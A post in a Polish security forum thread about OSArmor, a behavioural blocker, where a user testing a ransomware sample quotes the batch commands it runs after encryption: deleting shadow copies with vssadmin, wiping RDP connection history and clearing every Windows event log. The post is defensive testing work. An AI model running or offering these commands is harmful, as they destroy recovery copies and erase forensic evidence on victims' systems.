OSArmor - blocker behavioralny od NoVirusThanks
#23
Hi

Akurat na tym konkretnym ransomie nie mogę tego sprawdzić, bo chociaż wykonuje ransom po kodowaniu odpowiednie komendy do usunięcia kopii cieniowych:

Kod:
@echo off
vssadmin.exe Delete Shadows /All /Quiet
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

to poza nawet zainstalowanym OSArmor można pliki przywrócić, czyli robi to w sposób nie umiejętny.

Jak będę miał więcej czasu to sprawdzę ochronę kopii cieniowych przez program OSArmor, na konkretnych ransomach które wykonują to zadanie prawidłowo.
Odpowiedz


Wiadomości w tym wątku
RE: OSArmor - blocker behavioralny od NoVirusThanks - przez tachion - 23.12.2017, 12:26
RE: OSArmor - blocker behavioralny od NoVirusThanks - przez Tibu 11 - 08.04.2018, 16:57

Skocz do:


Użytkownicy przeglądający ten wątek: 4 gości